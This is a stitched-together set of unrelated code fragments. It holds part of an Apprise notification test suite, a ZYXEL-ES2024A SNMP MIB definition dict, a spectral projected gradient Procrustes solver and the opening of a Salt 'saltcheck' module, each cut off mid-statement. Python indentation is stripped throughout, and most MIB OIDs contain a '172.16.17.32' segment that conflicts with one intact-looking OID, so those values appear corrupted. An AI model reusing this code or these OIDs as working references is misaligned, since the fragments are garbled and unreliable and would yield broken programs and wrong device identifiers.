assert section != 'tokens'
# must be a string
assert isinstance(
arg['alias_of'], (six.string_types, list, tuple, set))
aliases = [arg['alias_of']] \
if isinstance(arg['alias_of'], six.string_types) \
else arg['alias_of']
for alias_of in aliases:
# Track our alias_of object
map_to_aliases.add(alias_of)
# We can't be an alias_of ourselves
if key == alias_of:
# This is acceptable as long as we exist in the
# tokens table because that is truely what we map
# back to
assert key in entry['details']['tokens']
else:
# Throw the problem into an assert tag for
# debugging purposes... the mapping is not
# acceptable
assert key != alias_of
# alias_of always references back to tokens
assert \
alias_of in entry['details']['tokens'] or \
alias_of in entry['details']['args']
# Find a list directive in our tokens
t_match = entry['details']['tokens']\
.get(alias_of, {})\
.get('type', '').startswith('list')
a_match = entry['details']['args']\
.get(alias_of, {})\
.get('type', '').startswith('list')
if not (t_match or a_match):
# Ensure the only token we have is the alias_of
# hence record should look like as example):
# {
# 'token': {
# 'alias_of': 'apitoken',
# },
# }
#
# Or if it can represent more then one entry; in
# this case, one must define a name (to define
# grouping).
# {
# 'token': {
# 'name': 'Tokens',
# 'alias_of': ('apitoken', 'webtoken'),
# },
# }
if isinstance(arg['alias_of'], six.string_types):
assert len(entry['details'][section][key]) == 1
else: # is tuple,list, or set
assert len(entry['details'][section][key]) == 2
# Must have a name defined to define grouping
assert 'name' in entry['details'][section][key]
else:
# We're a list, we allow up to 2 variables
# Obviously we have the alias_of entry; that's why
# were at this part of the code. But we can
# additionally provide a 'delim' over-ride.
assert len(entry['details'][section][key]) <= 2
if len(entry['details'][section][key]) == 2:
# Verify that it is in fact the 'delim' tag
assert 'delim' in \
entry['details'][section][key]
# If we do have a delim value set, it must be
# of a list/set/tuple type
assert isinstance(
entry['details'][section][key]['delim'],
(tuple, set, list),
)
if six.PY2:
# inspect our object
# getargspec() is deprecated in Python v3
spec = inspect.getargspec(SCHEMA_MAP[protocols[0]].__init__)
function_args = \
(set(parse_list(spec.keywords)) - set(['kwargs'])) \
| (set(spec.args) - set(['self'])) | valid_kwargs
else:
# Python v3+ uses getfullargspec()
spec = inspect.getfullargspec(SCHEMA_MAP[protocols[0]].__init__)
function_args = \
(set(parse_list(spec.varkw)) - set(['kwargs'])) \
| (set(spec.args) - set(['self'])) | valid_kwargs
# Iterate over our map_to_entries and make sure that everything
# maps to a function argument
for arg in map_to_entries:
if arg not in function_args:
# This print statement just makes the error easier to
# troubleshoot
print('{}:// template/arg/func reference missing error.'
.format(protocols[0]))
assert arg in function_args
# Iterate over all of the function arguments and make sure that
# it maps back to a key
function_args -= valid_kwargs
for arg in function_args:
if arg not in map_to_entries:
# This print statement just makes the error easier to
# troubleshoot
print('{}:// template/func/arg reference missing error.'
.format(protocols[0]))
assert arg in map_to_entries
# Iterate over our map_to_aliases and make sure they were defined in
# either the as a token or arg
for arg in map_to_aliases:
assert arg in set(entry['details']['args'].keys()) \
| set(entry['details']['tokens'].keys())
# Template verification
assert 'templates' in entry['details']
assert isinstance(entry['details']['templates'], (set, tuple, list))
# Iterate over our templates and parse our arguments
for template in entry['details']['templates']:
# Ensure we've properly opened and closed all of our tokens
assert template.count('{') == template.count('}')
expected_tokens = template.count('}')
args = template_token_re.findall(template)
assert expected_tokens == len(args)
# Build a cross reference set of our current defined objects
defined_tokens = set()
for key, arg in entry['details']['tokens'].items():
defined_tokens.add(key)
if 'alias_of' in arg:
defined_tokens.add(arg['alias_of'])
# We want to make sure all of our defined tokens have been
# accounted for in at least one defined template
for arg in args:
assert arg in set(entry['details']['args'].keys()) \
| set(entry['details']['tokens'].keys())
# The reverse of the above; make sure that each entry defined
# in the template_tokens is accounted for in at least one of
# the defined templates
assert arg in defined_tokens
@pytest.mark.skipif(sys.version_info.major <= 2, reason="Requires Python 3.x+")
@mock.patch('requests.post')
@mock.patch('apprise.py3compat.asyncio.notify', wraps=py3aio.notify)
def test_apprise_async_mode(mock_async_notify, mock_post, tmpdir):
"""
API: Apprise() async_mode tests
"""
mock_post.return_value.status_code = requests.codes.ok
# Define some servers
servers = [
'xml://localhost',
'json://localhost',
]
# Default Async Mode is to be enabled
asset = AppriseAsset()
assert asset.async_mode is True
# Load our asset
a = Apprise(asset=asset)
# add our servers
a.add(servers=servers)
# 2 servers loaded
assert len(a) == 2
# Our servers should carry this flag
for server in a:
assert server.asset.async_mode is True
# Send Notifications Asyncronously
assert a.notify("async") is True
# Verify our async code got executed
assert mock_async_notify.call_count == 1
mock_async_notify.reset_mock()
# Provide an over-ride now
asset = AppriseAsset(async_mode=False)
assert asset.async_mode is False
# Load our asset
a = | |
"ipSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11",
}, # node
"dnsIpAddress" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtIpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2",
}, # node
"defaultMgmtIpType" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dhcp_client" : {
"nodetype" : "namednumber",
"number" : "0"
},
"static_ip" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtVid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtStaticIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtStaticSubnetMask" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtStaticGateway" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"maxNumOfMgmtIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"mgmtIpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6",
"status" : "current",
"description" :
"""""",
}, # table
"mgmtIpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mgmtEntryIp",
"mgmtEntryVid",
],
"description" :
"""An entry in mgmtIpTable.""",
}, # row
"mgmtEntryIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntrySubnetMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntryGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"mgmtEntryManageable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntryRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12",
}, # node
"filterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1",
"status" : "current",
"description" :
"""""",
}, # table
"filterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1",
"create" : "true",
"status" : "current",
"linkage" : [
"filterMacAddr",
"filterVid",
],
"description" :
"""An entry in filterTable.""",
}, # row
"filterName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterMacAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"filterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"filterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13",
}, # node
"mirrorState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorMonitorPort" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorIngActionState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "0"
},
"destination_mac" : {
"nodetype" : "namednumber",
"number" : "1"
},
"source_mac" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorIngMacAddr" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorEgrActionState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "0"
},
"destination_mac" : {
"nodetype" : "namednumber",
"number" : "1"
},
"source_mac" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorEgrMacAddr" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.7",
"status" : "current",
"description" :
"""""",
}, # table
"mirrorEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.7.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in mirrorTable.""",
}, # row
"mirrorMirroredState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.16.13.7.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorDirection" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.7.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"ingress" : {
"nodetype" : "namednumber",
"number" : "0"
},
"egress" : {
"nodetype" : "namednumber",
"number" : "1"
},
"both" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.14",
}, # node
"aggrState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.14.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"aggrSystemPriority" : {
"nodetype" : | |
fileobj, B1=None, blobopprod=0.0):
"""
Nonmonotone Spectral Projected Gradient solver for problems of the type
.. math::
\\min \\lVert AXC - B\\rVert_F^2 \\qquad s.t. X^TX = I
The method is described in references :cite:`FranBaza12` and
:cite:`FranBazaWebe17`, and we implement a few variations (including a
monotone version, a nonmonotone version using the strategy described in
:cite:`FranBaza12`, and a nonmonotone version using the strategy
described in :cite:`FranBazaWebe17`; check below for more details on how
to select these different algorithms).
This function is called by ``spectral_solver`` from both GKBSolver and
SPGSolver, with different parameters.
Input:
- ``problem``: ``ProcrustesProblem`` instance
- ``largedim``: ``int``
- ``smalldim``: ``int``
Since this function is called by ``spectral_solver``, it is possible
we are solving a smaller version of the original problem (when using
GKBSolver, for instance). Thus, ``lagedim`` and ``smalldim`` are the
dimensions of the current problem being solved by ``spectral_solver``.
- ``X``: ``ndarray(smalldim, p)``
Initial guess for the solution X of the Procrustes Problem being solved.
- ``A``: ``ndarray(largedim, smalldim)``
- ``B``: ``ndarray(largedim, q)``
- ``solvername``: str
Takes values ``spg`` or ``gkb`` (used to decide if ``full_results`` can
be reported).
- ``options``: ``dict``
Solver options. Keys available are:
- ``eta``: ``float``
parameter for the nonmonotone cost computation
- ``etavar``: ``bool``
decide if we are going to vary the parameter eta
for the nonmonotone cost computation
- ``maxiter``: ``int``
Maximum number of iterations allowed
- ``strategy``: ``str``
``monot`` (Monotone strategy), ``bazfr`` (Nonmonotone strategy
described in :cite:`FranBaza12`) or ``newfw`` (Nonmonotone
strategy described in :cite:`FranBazaWebe17`)
- ``verbose``: ``int``
Can take values in (0,1,2,3)
- ``gtol``: ``float``
Tolerance for convergence.
- ``bloboptest``: (*default*: ``False``)
boolean option to test the computation of a new residual at lower
GKB levels to decide if we are going to iterate at this level or
give up and add a new block to the bidiagonalization.
- ``polar``: (*default*: ``None``)
option to decide if we are going to compute the solution of the
GKB subproblem via an SVD decomposition or via iterative methods
to compute the polar decomposition.
Can take values ``ns`` or ``None``.
Output:
- ``exitcode``: ``int``
0 (success) or 1 (failure)
- ``f``: ``float``
Value of the objective function at final iterate
- ``X``: ``ndarray(smalldim, p)``
Approximate solution (final iterate)
- ``normg``: ``float``
Criticality measure at final iterate
- ``outer``: ``int``
Final number of outer iterations performed.
"""
# Setup
# A(largedim, smalldim)
# B(largedim, q)
# problem.C(p, q)
# X(smalldim, p)
m, n, p, q = problem.sizes # original sizes, not reduced
# chi determines by which factor is rho increased at each
# unsuccessful iteration
chi = 5.0 # juliano
# cost = [None]*(options["maxiter"]+1)
cost = []
# "total_fun" and "total_grad" store the criticality info
# for each iteration
if options["full_results"] and solvername == "spg":
problem.stats["total_fun"] = []
problem.stats["total_grad"] = []
# Barzilai-Borwein parameter
sigma_min = 1.0e-10
# Sufficient decrease parameter for trust region
# (trratio must be larger than beta1)
beta1 = 1.0e-4 # beta1 = 1.0e-10, beta1 = 0.5
# memory is the nonmonotone parameter, used to determine how many
# iterations will be used in the BAZFR strategy to compare the current
# objective function
# with past values.
if options["strategy"] == "monot":
memory = 1
else:
memory = 10
# Lu approximates the Lipschitz constant for the gradient of f
Lu = 2.0*sp.norm(np.dot(problem.C, problem.C.T), 'fro')*sp.norm(np.dot(A.T, A), 'fro')
# TODO check line below
if options["precond"] is not None:
Lu = options["precond"]*Lu
if options["verbose"] > 2:
print("\n Lu = {}".format(Lu), file=fileobj)
# R is the residual, norm(R,fro) is the cost.
R, residual = compute_residual(A, B, problem.C, X, options["precond"])
cost.append(residual)
# problem.stats["fev"] = problem.stats["fev"] + 1
problem.stats["fev"] = problem.stats["fev"] + (largedim/m)
quot = None
if options["strategy"] == "newfw":
if options["etavar"]:
eta = 0.9
else:
eta = options["eta"]
quot = 1.0
f = cost[0]
# Here, normg is the infinity norm of the "Projected Gradient"
normg, normgrad, grad = optimality(A, problem.C, R, X, options["precond"])
problem.stats["gradient"] = problem.stats["gradient"] + 1
if options["full_results"] and solvername == "spg":
problem.stats["total_fun"].append(f)
problem.stats["total_grad"].append(normg)
if options["verbose"] > 1:
print("\n OUTER ITERATION 0:\n", file=fileobj)
print(" f = {}".format(f), file=fileobj)
print(" normg = {}".format(normg), file=fileobj)
elif options["verbose"] == 1:
print(" nbiter f cost normg",
file=fileobj)
print("===========================================================",
file=fileobj)
print(" {0:>4} {1:>16.4e} {2:>16.4e} {3:>16.4e}".
format(0, f, f, normg), file=fileobj)
# problem.stats["nbiter"] = 0
outer = 0
# If flag_while, then continue cycling.
flag_while = True
flag_inner = True
ftrial = 0.0
Xold = X.copy()
oldRes = 0.0
Xtrial = None
Rtrial = None
while (normg > options["gtol"]
and flag_while
and outer < options["maxiter"]):
# Computation of the trust-region step parameters
if outer == 0:
sigma_bb = 0.5
else:
step = np.copy(X - Xold)
AstepC = np.dot(A, np.dot(step, problem.C))
sigma_bb = (sp.norm(AstepC, 'fro')**2)/(sp.norm(step, 'fro')**2)
# sigma_bb is the Barzilai-Borwein parameter.
sigma = max(sigma_min, sigma_bb)
trratio = beta1/2.0
# rho is the regularization parameter for the quadratic model
rho = sigma
if options["verbose"] > 2:
print(" sigma = rho = {}".format(sigma), file=fileobj)
nbinnerit = 0
W = np.zeros(X.shape)
# Inner iteration
# =============================================================
while flag_inner and trratio < beta1:
if options["verbose"] > 2:
print("\n INNER ITERATION {}:".format(nbinnerit),
file=fileobj)
print(" f = {}".format(cost[outer]), file=fileobj)
print(" normg = {}".format(normg), file=fileobj)
# Solving the subproblem: Xtrial, the solution to the subproblem,
# is defined as
# Xtrial = U*V' = UW*VWT
# where
# [U,S,V] = svd(W,0)
# where the above line is the "economy size" svd decomposition
# of W, defined as
W = np.copy(X - (1.0/(rho + sigma))*grad)
if options["polar"] == "ns":
Xtrial = polardecomp(W, options)
else:
# If X is m-by-n with m > n, then svd(X,0) computes only the
# first n columns of U and S is (n,n)
UW, SW, VWT = sp.svd(W, full_matrices=False)
# UW, SW, VWT = sp.svd(W)
# W(smalldim,p)
# UW(smalldim,min(smalldim,p))
# VWT(min(smalldim,p),p)
Xtrial = np.dot(UW, VWT)
problem.stats["svd"] = problem.stats["svd"] + 1
# Computing constraint violation to see if the subproblem
# solution has been satisfactorily solved
constraintviolation = np.abs(sp.norm(np.dot(Xtrial.T, Xtrial),
np.inf) - 1.0)
if constraintviolation >= 1.0e-5:
msg = _status_message['infeasible']
raise Exception("Warning: constraint violation = {}"
.format(constraintviolation))
Rtrial, ftrial = compute_residual(A, B, problem.C, Xtrial,
options["precond"])
# problem.stats["fev"] = problem.stats["fev"]+1
problem.stats["fev"] = problem.stats["fev"] + (largedim/m)
if options["verbose"] > 2:
print(" ftrial = {}".format(ftrial), file=fileobj)
ared = f - ftrial
pred = - np.trace(np.dot(grad.T, (Xtrial-X))
- (sigma/2.0)*sp.norm(Xtrial-X, 'fro')**2)
if np.abs(pred) < 1.0e-15:
msg = _status_message['smallpred']
print('Warning: ' + msg, file=fileobj)
trratio = 0.0
# flag_while = False
else:
trratio = ared/pred
if pred < 0:
msg = _status_message['negativepred']
print('Warning: ' + msg, file=fileobj)
# flag_while = False
# trratio = 0.0
if options["verbose"] > 2:
print(" ared = {}".format(ared), file=fileobj)
print(" pred = {}".format(pred), file=fileobj)
print(" trratio = {}".format(trratio),
file=fileobj)
if trratio > beta1:
flag_inner = False
if options["verbose"] > 2:
print("\n INNER ITERATION FINISHED: success",
file=fileobj)
print(" trratio = {}".format(trratio),
file=fileobj)
print(" beta1 = {}".format(beta1),
file=fileobj)
# Below is equation (15) from (<NAME>, 2012)
if flag_inner and flag_while:
rho = chi*rho
if rho > Lu:
if options["verbose"] > 1:
print(" WARNING: Using Lu "
" parameter = {} to ensure sufficient decrease "
" (inner {} and outer = {})"
.format(Lu, nbinnerit, outer), file=fileobj)
options["verbose"] = 3
sigma = Lu
if options["verbose"] > 2:
print(" rho = {}".format(rho), file=fileobj)
print(" sigma = {}"
.format(sigma), file=fileobj)
nbinnerit = nbinnerit + 1
if nbinnerit >= options["maxiter"]:
msg = _status_message['maxiter']
print('Warning: ' + msg + '(inner loop)', file=fileobj)
trratio = 1.0 # just to leave the while
# end while innerit ================================================
Xold = X.copy()
X = Xtrial.copy()
R = Rtrial.copy()
cost.append(ftrial)
# TODO: fix this (refactor?)
# Compute cost
if options["strategy"] == "MONOT":
f = cost[outer+1]
elif options["strategy"] == "BAZFR":
if outer < memory:
f = max(cost)
else:
f = max(cost[outer+1-memory:outer+1])
else:
# newfw
qold = quot
quot = eta*qold + 1.0
f = (eta*qold*f+ftrial)/quot
if options["etavar"]:
eta = max(0.75*eta, 0.0) # starting from eta | |
# Repository: dvogt/salt-check
# -*- coding: utf-8 -*-
'''
A module for testing the logic of states and highstates
Saltcheck provides unittest like functionality requiring only the knowledge of salt module execution and yaml.
In order to run state and highstate saltcheck tests a sub-folder of a state must be created and named "saltcheck-tests".
Tests for a state should be created in files ending in *.tst and placed in the saltcheck-tests folder.
Multiple tests can be created in a file.
Multiple *.tst files can be created in the saltcheck-tests folder.
Salt rendering is supported in test files e.g. yaml + jinja.
The "id" of a test works in the same manner as in salt state files.
They should be unique and descriptive.
Example file system layout:
/srv/salt/apache/
init.sls
config.sls
saltcheck-tests/
pkg_and_mods.tst
config.tst
Saltcheck Test Syntax:
Unique-ID:
module_and_function:
args:
kwargs:
assertion:
expected-return:
Example test 1:
echo-test-hello:
module_and_function: test.echo
args:
- "hello"
kwargs:
assertion: assertEqual
expected-return: 'hello'
:codeauthor: <NAME> <<EMAIL>>
:maturity: new
'''
from __future__ import absolute_import
import logging
import os
import time
from json import loads, dumps
import yaml
try:
import salt.utils
import salt.client
import salt.exceptions
from salt.utils.odict import OrderedDict
except ImportError:
pass
log = logging.getLogger(__name__)
__virtualname__ = 'saltcheck'
def __virtual__():
'''
Check dependencies - may be useful in future
'''
return __virtualname__
def update_master_cache():
    '''
    Transfer all saltcheck-tests from the master into the minion cache.
    Run once before executing tests and again whenever tests change.
    Can be automated by setting "auto_update_master_cache: True" in the
    minion config.
    CLI Example:
        salt '*' saltcheck.update_master_cache
    '''
    cache_master = __salt__['cp.cache_master']
    cache_master()
    return True
def run_test(**kwargs):
    '''
    Execute one saltcheck test and return its result.
    :param keyword arg test: a single test definition (dict)
    CLI Example::
        salt '*' saltcheck.run_test
            test='{"module_and_function": "test.echo",
                   "assertion": "assertEqual",
                   "expected-return": "This works!",
                   "args":["This works!"] }'
    '''
    # Instantiate first: construction may refresh the master cache,
    # which happens regardless of whether the test argument is valid.
    scheck = SaltCheck()
    # salt converts the string to a dictionary auto-magically
    test = kwargs.get('test', None)
    if not (test and isinstance(test, dict)):
        return "Test must be a dictionary"
    return scheck.run_test(test)
def state_apply(state_name, **kwargs):
    '''
    Run state.apply for the given state (with optional pillar/kwargs)
    to set up test data.

    :param str state_name: the name of a user defined state
    :param dict kwargs: optional keyword arguments forwarded to state.apply
    CLI Example:
        salt '*' saltcheck.state_apply postfix
    '''
    caller = salt.client.Caller()
    # An empty **kwargs expands to no arguments, so the former
    # if/else duplication of this call was redundant.
    caller.cmd('state.apply', state_name, **kwargs)
    return
def run_state_tests(state):
    '''
    Execute all tests for a salt state and return results.
    Nested states will also be tested.
    :param str state: the name of a user defined state
    CLI Example::
        salt '*' saltcheck.run_state_tests postfix
    '''
    checker = SaltCheck()
    loader = StateTestLoader(
        search_paths=checker.get_state_search_path_list())
    results = OrderedDict()
    for sls_name in _get_state_sls(state):
        loader.add_test_files_for_sls(loader.convert_sls_to_path(sls_name))
        loader.load_test_suite()
        per_state = OrderedDict()
        for test_name, test_body in loader.test_dict.items():
            per_state[test_name] = checker.run_test(test_body)
        results[sls_name] = per_state
    return _generate_out_list(results)
def run_highstate_tests():
    '''
    Execute all tests for a salt highstate and return results.
    CLI Example::
        salt '*' saltcheck.run_highstate_tests
    '''
    checker = SaltCheck()
    loader = StateTestLoader(
        search_paths=checker.get_state_search_path_list())
    results = OrderedDict()
    # Collect the unique sls names referenced by every top-file state,
    # preserving first-seen order.
    unique_states = []
    for top_state in _get_top_states():
        for sls_name in _get_state_sls(top_state):
            if sls_name not in unique_states:
                unique_states.append(sls_name)
    for sls_name in unique_states:
        loader.add_test_files_for_sls(loader.convert_sls_to_path(sls_name))
        loader.load_test_suite()
        per_state = OrderedDict()
        for test_name, test_body in loader.test_dict.items():
            per_state[test_name] = checker.run_test(test_body)
        results[sls_name] = per_state
    return _generate_out_list(results)
def _generate_out_list(results):
''' generate test results output list '''
passed = 0
failed = 0
skipped = 0
missing_tests = 0
total_time = 0.0
for state in results:
if len(results[state].items()) == 0:
missing_tests = missing_tests + 1
else:
for dummy, val in results[state].items():
log.info("dummy={}, val={}".format(dummy, val))
if val['status'].startswith('Pass'):
passed = passed + 1
if val['status'].startswith('Fail'):
failed = failed + 1
if val['status'].startswith('Skip'):
skipped = skipped + 1
total_time = total_time + float(val['duration'])
out_list = []
for key, value in results.items():
out_list.append({key: value})
out_list.sort()
out_list.append({"TEST RESULTS": {'Execution Time': round(total_time, 4), 'Passed': passed, 'Failed': failed, 'Skipped': skipped, 'Missing Tests': missing_tests}})
return out_list
def _render_file(file_path):
    '''Render a test file through the salt rendering pipeline (e.g. yaml + jinja).'''
    # Equivalent CLI:
    # salt-call slsutil.renderer /srv/salt/jinjatest/saltcheck-tests/test1.tst
    output = __salt__['slsutil.renderer'](file_path)
    log.info("rendered: {}".format(output))
    return output
def _is_valid_module(module):
    '''Return True if *module* is available on the minion.

    The old docstring claimed this returned a list; it returns a bool.
    '''
    modules = __salt__['sys.list_modules']()
    # "in" already yields a bool; the former bool() wrapper was redundant.
    return module in modules
def _get_auto_update_cache_value():
    '''
    Return the minion config value of auto_update_master_cache.

